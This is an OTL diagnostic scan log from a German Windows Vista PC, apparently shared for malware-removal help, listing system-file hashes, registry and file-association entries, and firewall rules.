< MD5 for: ATAPI.SYS  >
[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\drivers\atapi.sys
[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_b12d8e84\atapi.sys
[2009.04.11 07:32:26 | 000,019,944 | ---- | M] (Microsoft Corporation) MD5=1F05B78AB91C9075565A9D8A4B880BC4 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6002.18005_none_df23a1261eab99e8\atapi.sys
[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_cc18792d\atapi.sys
[2008.01.19 08:41:30 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=2D9C903DC76A66813D350A562DE40ED9 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6001.18000_none_dd38281a2189ce9c\atapi.sys
[2006.11.02 10:49:36 | 000,019,048 | ---- | M] (Microsoft Corporation) MD5=4F4FCB8B6EA06784FB6D475B7EC7300F -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_c6c2e699\atapi.sys
[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_7de13c21\atapi.sys
[2011.02.19 16:35:42 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=B35CFCEF838382AB6490B321C87EDF17 -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.16632_none_db337a442479c42c\atapi.sys
[2011.02.19 16:35:41 | 000,021,560 | ---- | M] (Microsoft Corporation) MD5=E03E8C99D15D0381E02743C36AFC7C6F -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.0.6000.20757_none_dbac78a93da31a8b\atapi.sys
 
< MD5 for: CNGAUDIT.DLL  >
[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\System32\cngaudit.dll
[2006.11.02 10:46:03 | 000,011,776 | ---- | M] (Microsoft Corporation) MD5=7F15B4953378C8B5161D65C26D5FED4D -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.0.6000.16386_none_e62d292932a96ce6\cngaudit.dll
 
< MD5 for: EXPLORER.EXE  >
[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=37440D09DEAE0B672A04DCCF7ABF06BE -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16771_none_4f83bb287ccdb7e3\explorer.exe
[2011.02.19 16:34:35 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=4F554999D7D5F05DAAEBBA7B5BA1089D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18164_none_5177ca9879e978e8\explorer.exe
[2011.02.19 16:34:35 | 002,927,616 | ---- | M] (Microsoft Corporation) MD5=50BA5850147410CDE89C523AD3BC606E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.22298_none_51e4f8c7931bd1e1\explorer.exe
[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=6D06CD98D954FE87FB2DB8108793B399 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16549_none_4fac29707cae347a\explorer.exe
[2011.02.19 17:04:57 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=BD06F0BF753BC704B653C3A50F89D362 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20668_none_501f261995dcf2cf\explorer.exe
[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\explorer.exe
[2009.04.11 07:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) MD5=D07D4C3038F3578FFCE1C0237F2A1253 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6002.18005_none_53a0201e76de3a0b\explorer.exe
[2011.02.19 16:34:36 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=E7156B0B74762D9DE0E66BDCDE06E5FB -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.20947_none_5033cb5995cd990b\explorer.exe
[2006.11.02 10:45:07 | 002,923,520 | ---- | M] (Microsoft Corporation) MD5=FD8C53FB002217F6F888BCF6F5D7084D -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6000.16386_none_4f7de5167cd15deb\explorer.exe
[2008.01.19 08:33:10 | 002,927,104 | ---- | M] (Microsoft Corporation) MD5=FFA764631CB70A30065C12EF8E174F9F -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.0.6001.18000_none_51b4a71279bc6ebf\explorer.exe
 
< MD5 for: IASTOR.SYS  >
[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\64\HDD\IaStor.sys
[2008.04.15 18:54:16 | 000,388,120 | ---- | M] (Intel Corporation) MD5=8D58627FEF3F8767665D9F4DC91CBD97 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver64\IaStor.sys
[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\32\HDD\IaStor.sys
[2008.04.15 18:53:44 | 000,312,344 | ---- | M] (Intel Corporation) MD5=DB0CC620B27A928D968C1A1E9CD9CB87 -- C:\Swsetup\Drivers\Global\INTELMSM\Winall\Driver\IaStor.sys
 
< MD5 for: IASTORV.SYS  >
[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_c9df7691\iaStorV.sys
[2008.01.19 08:42:51 | 000,235,064 | ---- | M] (Intel Corporation) MD5=54155EA1B0DF185878E0FC9EC3AC3A14 -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.0.6001.18000_none_af11527887c7fa8f\iaStorV.sys
[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\drivers\iaStorV.sys
[2006.11.02 10:51:25 | 000,232,040 | ---- | M] (Intel Corporation) MD5=C957BF4B5D80B46C5017BF0101E6C906 -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_37cdafa4\iaStorV.sys
 
< MD5 for: NETLOGON.DLL  >
[2006.11.02 10:46:11 | 000,559,616 | ---- | M] (Microsoft Corporation) MD5=889A2C9F2AACCD8F64EF50AC0B3D553B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6000.16386_none_fb80f5473b0ed783\netlogon.dll
[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\System32\netlogon.dll
[2009.04.11 07:28:23 | 000,592,896 | ---- | M] (Microsoft Corporation) MD5=95DAECF0FB120A7B5DA679CC54E37DDE -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6002.18005_none_ffa3304f351bb3a3\netlogon.dll
[2008.01.19 08:35:36 | 000,592,384 | ---- | M] (Microsoft Corporation) MD5=A8EFC0B6E75B789F7FD3BA5025D4E37F -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.0.6001.18000_none_fdb7b74337f9e857\netlogon.dll
 
< MD5 for: NVSTOR.SYS  >
[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\drivers\nvstor.sys
[2006.11.02 10:50:13 | 000,040,040 | ---- | M] (NVIDIA Corporation) MD5=9E0BA19A28C498A6D323D065DB76DFFC -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_733654ff\nvstor.sys
[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_31c3d71d\nvstor.sys
[2008.01.19 08:42:09 | 000,045,112 | ---- | M] (NVIDIA Corporation) MD5=ABED0C09758D1D97DB0042DBB2688177 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.0.6001.18000_none_39dac327befea467\nvstor.sys
 
< MD5 for: SCECLI.DLL  >
[2008.01.19 08:36:19 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=28B84EB538F7E8A0FE8B9299D591E0B9 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6001.18000_none_380de25bd91b6f12\scecli.dll
[2006.11.02 10:46:12 | 000,176,640 | ---- | M] (Microsoft Corporation) MD5=80E2839D05CA5970A86D7BE2A08BFF61 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6000.16386_none_35d7205fdc305e3e\scecli.dll
[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\System32\scecli.dll
[2009.04.11 07:28:24 | 000,177,152 | ---- | M] (Microsoft Corporation) MD5=8FC182167381E9915651267044105EE1 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.0.6002.18005_none_39f95b67d63d3a5e\scecli.dll
 
< MD5 for: USER32.DLL  >
[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=63B4F59D7C89B1BF5277F1FFEFD491CD -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16438_none_cb39bc5b7047127e\user32.dll
[2011.02.19 14:18:15 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=9D9F061EDA75425FC67F0365E3467C86 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.20537_none_cbc258dc896598f1\user32.dll
[2008.01.19 08:36:46 | 000,627,200 | ---- | M] (Microsoft Corporation) MD5=B974D9F06DC7D1908E825DC201681269 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6001.18000_none_cd386c416d5c7f32\user32.dll
[2006.11.02 10:46:13 | 000,633,856 | ---- | M] (Microsoft Corporation) MD5=E698A5437B89A285ACA3FF022356810A -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6000.16386_none_cb01aa4570716e5e\user32.dll
[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\System32\user32.dll
[2009.04.11 07:28:25 | 000,627,712 | ---- | M] (Microsoft Corporation) Unable to obtain MD5 -- C:\Windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.0.6002.18005_none_cf23e54d6a7e4a7e\user32.dll
 
< MD5 for: USERINIT.EXE  >
[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\System32\userinit.exe
[2008.01.19 08:33:33 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=0E135526E9785D085BCD9AEDE6FBCBF9 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6001.18000_none_dc28ba15d1aff80b\userinit.exe
[2006.11.02 10:45:50 | 000,024,576 | ---- | M] (Microsoft Corporation) MD5=22027835939F86C3E47AD8E3FBDE3D11 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.0.6000.16386_none_d9f1f819d4c4e737\userinit.exe
 
< MD5 for: WINLOGON.EXE  >
[2012.12.14 16:49:28 | 000,216,424 | ---- | M] () MD5=22101A85B3CA2FE2BE05FE9A61A7A83D -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\System32\winlogon.exe
[2009.04.11 07:28:13 | 000,314,368 | ---- | M] (Microsoft Corporation) MD5=898E7C06A350D4A1A64A9EA264D55452 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6002.18005_none_71ae7a22d2134741\winlogon.exe
[2006.11.02 10:45:57 | 000,308,224 | ---- | M] (Microsoft Corporation) MD5=9F75392B9128A91ABAFB044EA350BAAD -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6000.16386_none_6d8c3f1ad8066b21\winlogon.exe
[2008.01.19 08:33:37 | 000,314,880 | ---- | M] (Microsoft Corporation) MD5=C2610B6BDBEFC053BBDAB4F1B965CB24 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.0.6001.18000_none_6fc30116d4f17bf5\winlogon.exe
 
< MD5 for: WS2IFSL.SYS  >
[2006.11.02 09:58:26 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=84620AECDCFD2A7A14E6263927D8C0ED -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6000.16386_none_4d4fded8cae2956d\ws2ifsl.sys
[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\System32\drivers\ws2ifsl.sys
[2008.01.19 06:56:49 | 000,015,872 | ---- | M] (Microsoft Corporation) MD5=E3A3CB253C0EC2494D4A61F5E43A389C -- C:\Windows\winsxs\x86_microsoft-windows-w..rastructure-ws2ifsl_31bf3856ad364e35_6.0.6001.18000_none_4f86a0d4c7cda641\ws2ifsl.sys
 
< %systemroot%\system32\drivers\*.sys /lockedfiles >
 
< %systemroot%\System32\config\*.sav >
[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\COMPONENTS.SAV
[2006.11.02 11:34:05 | 000,020,480 | ---- | M] () -- C:\Windows\System32\config\DEFAULT.SAV
[2006.11.02 11:34:05 | 000,008,192 | ---- | M] () -- C:\Windows\System32\config\SECURITY.SAV
[2006.11.02 11:34:08 | 010,133,504 | ---- | M] () -- C:\Windows\System32\config\SOFTWARE.SAV
[2006.11.02 11:34:08 | 001,826,816 | ---- | M] () -- C:\Windows\System32\config\SYSTEM.SAV
 
< %systemroot%\system32\*.dll /lockedfiles >
 
< %USERPROFILE%\*.* >
[2012.06.03 16:11:51 | 000,000,021 | ---- | M] () -- C:\Users\TuS\.gtk-bookmarks
[2013.02.18 21:29:48 | 000,021,751 | ---- | M] () -- C:\Users\TuS\.recently-used.xbel
[2012.09.11 20:05:02 | 000,224,118 | ---- | M] () -- C:\Users\TuS\01108_yaquinaheadlighthouse_1280x800.jpg
[2013.02.18 23:33:26 | 002,097,152 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT
[2013.02.18 23:33:26 | 000,262,144 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG1
[2011.02.18 16:50:49 | 000,000,000 | -H-- | M] () -- C:\Users\TuS\ntuser.dat.LOG2
[2013.02.18 17:31:30 | 000,065,536 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TM.blf
[2013.02.18 17:31:30 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000001.regtrans-ms
[2011.02.18 17:19:44 | 000,524,288 | -HS- | M] () -- C:\Users\TuS\NTUSER.DAT{d8932e6d-6a6f-11db-b6ab-a038f15a5785}.TMContainer00000000000000000002.regtrans-ms
[2011.02.18 16:50:50 | 000,000,020 | -HS- | M] () -- C:\Users\TuS\ntuser.ini
[2012.11.20 19:18:36 | 000,047,432 | ---- | M] () -- C:\Users\TuS\umbrella0.log
 
< %USERPROFILE%\Local Settings\Temp\*.exe >
 
< %USERPROFILE%\Local Settings\Temp\*.dll >
 
< %USERPROFILE%\Application Data\*.exe >
 
< HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs >
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Required: DebugWindows [binary data]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems\\Windows: %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16
 
<           >

< End of report >

--- --- ---

[QUOTE=Extras.txt]OTL Logfile:

Code:

ATTFilter

OTL Extras logfile created on: 18.02.2013 23:28:40 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\TuS\Desktop
Windows Vista Home Basic Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy
 
1,93 Gb Total Physical Memory | 0,84 Gb Available Physical Memory | 43,54% Memory free
4,10 Gb Paging File | 2,67 Gb Available in Paging File | 65,16% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files
Drive C: | 222,88 Gb Total Space | 174,72 Gb Free Space | 78,39% Space Free | Partition Type: NTFS
Drive D: | 1021,00 Mb Total Space | 1015,54 Mb Free Space | 99,46% Space Free | Partition Type: FAT32
Drive E: | 9,00 Gb Total Space | 1,65 Gb Free Space | 18,38% Space Free | Partition Type: NTFS
Drive G: | 1863,01 Gb Total Space | 1809,74 Gb Free Space | 97,14% Space Free | Partition Type: NTFS
Drive H: | 465,65 Gb Total Space | 206,65 Gb Free Space | 44,38% Space Free | Partition Type: FAT32
 
Computer Name: TUS-PC | User Name: TuS | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\System32\control.exe (Microsoft Corporation)
.hlp [@ = hlpfile] -- C:\Windows\winhlp32.exe (Microsoft Corporation)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
hlpfile [open] -- %SystemRoot%\winhlp32.exe %1 (Microsoft Corporation)
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %windir%\system32\mshtml.dll,PrintHTML "%1"
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [AddToPlaylistVLC] -- "C:\Program Files\VLC Player\vlc.exe" --started-from-file --playlist-enqueue "%1" ()
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Directory [PlayWithVLC] -- "C:\Program Files\VLC Player\vlc.exe" --started-from-file --no-playlist-enqueue "%1" ()
Folder [open] -- %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /separate,/e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
"VistaSp1" = Reg Error: Unknown registry data type -- File not found
"VistaSp2" = Reg Error: Unknown registry data type -- File not found
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{057D27D1-B87A-43B4-8BF7-619F9B2DF478}" = rport=3702 | protocol=17 | dir=out | app=%systemroot%\system32\p2phost.exe | 
"{0A70B203-CD7F-41C2-BFD8-EB5A8B4B4349}" = rport=3540 | protocol=17 | dir=out | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
"{206286A9-5709-4AEE-BE25-1D359BB6B697}" = lport=3587 | protocol=6 | dir=in | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{21B6C9B4-B224-434B-B786-16C397DAE91F}" = lport=5722 | protocol=6 | dir=in | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{23540C13-646E-4035-A0AA-BCA5F6789642}" = lport=3587 | protocol=6 | dir=in | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{270DFD55-1C59-4102-8356-9FC4C85F2333}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{4433E133-38A7-4517-A121-057F86527125}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{44F4B623-327D-447E-A5E9-BADA5404472D}" = lport=3540 | protocol=17 | dir=in | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
"{51782EC5-5106-4C58-9335-ADB35D8526F3}" = rport=5722 | protocol=6 | dir=out | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{73922679-2FA8-4CD9-B1C3-6483D115C3A7}" = rport=3702 | protocol=17 | dir=out | app=%systemroot%\system32\p2phost.exe | 
"{7E96D817-15F3-425C-8599-FCC0FAD660CC}" = lport=3702 | protocol=17 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{8E7064EA-3EF1-47BA-BD0D-20E760B4A099}" = lport=3702 | protocol=17 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{8F82233B-3ECE-43A3-BEE8-B07624BBBA4C}" = rport=5722 | protocol=6 | dir=out | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{9C9C09DE-B81F-48DA-86B6-38C5D1D55829}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{9E555EE3-C125-40A2-8D57-6B19969C9440}" = lport=5722 | protocol=6 | dir=in | svc=dfsr | app=%systemroot%\system32\dfsr.exe | 
"{A22F06AF-89EF-4215-AB25-5F35286067F1}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{AA99495E-47B0-4118-BEE4-47A39EC45D51}" = rport=3587 | protocol=6 | dir=out | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{B3535AD2-5D0E-41DB-AE6F-1DE9B36B5D2F}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=c:\windows\system32\svchost.exe | 
"{D16BD2BF-ADA8-4B79-867D-348827EBFA31}" = rport=3587 | protocol=6 | dir=out | svc=p2psvc | app=%systemroot%\system32\svchost.exe | 
"{D67306CB-3431-4BB3-8513-DFEFEB9CB82D}" = rport=3540 | protocol=17 | dir=out | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
"{FE136888-106D-4079-B7BA-94F51B5B9C7D}" = lport=3540 | protocol=17 | dir=in | svc=pnrpsvc | app=%systemroot%\system32\svchost.exe | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0819217F-77E9-4E62-8F9C-825430376B8F}" = dir=in | app=c:\program files\itunes\itunes.exe | 
"{095C0471-5E91-4D4E-A99E-65BC95ED0459}" = protocol=6 | dir=in | app=c:\program files\pinnacle\shared files\programs\strmserver\strmserver.exe | 
"{0A6129E9-AB35-44CA-9126-61C9240A5FDA}" = protocol=17 | dir=in | app=c:\program files\common files\pctv systems\pvr\videocontrol.exe | 
"{1171A7E0-ED4C-44FE-BA71-4B92D901D573}" = protocol=17 | dir=in | app=c:\program files\common files\pctv systems\streamingserver\strmserver.exe | 
"{15ACA777-C543-45D1-AFB2-CCD314B8ECF9}" = protocol=17 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{215C8497-7D58-431C-8243-AA3D3C005ADA}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{2526B81B-0AD0-4F14-A024-7EBF67F4C2C6}" = protocol=6 | dir=out | app=%systemroot%\system32\p2phost.exe | 
"{2B2B4BB3-0B9D-41E5-AA2B-AB2FC39ED731}" = protocol=6 | dir=in | app=c:\program files\common files\pctv systems\pvr\videocontrol.exe | 
"{2F415971-FFC0-4D66-A1BE-6FC5E52C86D3}" = dir=in | app=c:\program files\common files\apple\apple application support\webkit2webprocess.exe | 
"{5096DAFF-47E2-471E-9EBA-8662273B37DF}" = protocol=6 | dir=in | app=c:\program files\common files\pctv systems\streamingserver\strmserver.exe | 
"{520BE724-8A03-43CA-80C2-5AEA79E756DA}" = dir=in | app=c:\program files\skype\phone\skype.exe | 
"{55F89377-B20F-4B3E-89B8-B99FE1BB8631}" = protocol=17 | dir=in | app=c:\program files\pctv systems\tvcenter\tvcenter.exe | 
"{59F9AFCC-4B25-47D8-8D03-3C194B899FF2}" = protocol=6 | dir=out | app=%systemroot%\system32\p2phost.exe | 
"{5E8F2ECF-06F7-423A-859B-1E8DC00370C0}" = protocol=6 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{69FD919F-0009-4345-A4DE-06E2DE399108}" = protocol=6 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
"{7500E32D-86F6-40A8-B76E-8EA19B7428E5}" = protocol=6 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{82930E01-7C8D-431C-AEC1-D6BE0F54D0B8}" = protocol=6 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
"{87C2F6AE-D78B-4BD0-AE32-7194A4E3156B}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe | 
"{A5160E46-A4F1-4377-AF9D-96E5105C1C4F}" = protocol=17 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{AD06B8E8-7AF8-49A2-92B0-026E31DADE86}" = protocol=6 | dir=out | app=%programfiles%\windows collaboration\wincollab.exe | 
"{B63EB692-B61B-42F0-AABB-1B40B6DA6ACC}" = protocol=6 | dir=in | app=%systemroot%\system32\p2phost.exe | 
"{B8433C53-6A69-42E4-9740-C5A82EC8916D}" = protocol=6 | dir=in | app=c:\program files\pctv systems\tvcenter\tvcenter.exe | 
"{CBD98854-92C9-441E-9713-43D8CA89334E}" = protocol=6 | dir=in | app=c:\program files\teamviewer\version8\teamviewer.exe | 
"{CDEEC85A-3305-4435-995A-666F685CC843}" = protocol=17 | dir=in | app=c:\program files\teamviewer\version8\teamviewer_service.exe | 
"{D1D6CE0B-D6BF-4DBE-9823-CE0D8F65068C}" = protocol=17 | dir=in | app=%programfiles%\windows collaboration\wincollab.exe | 
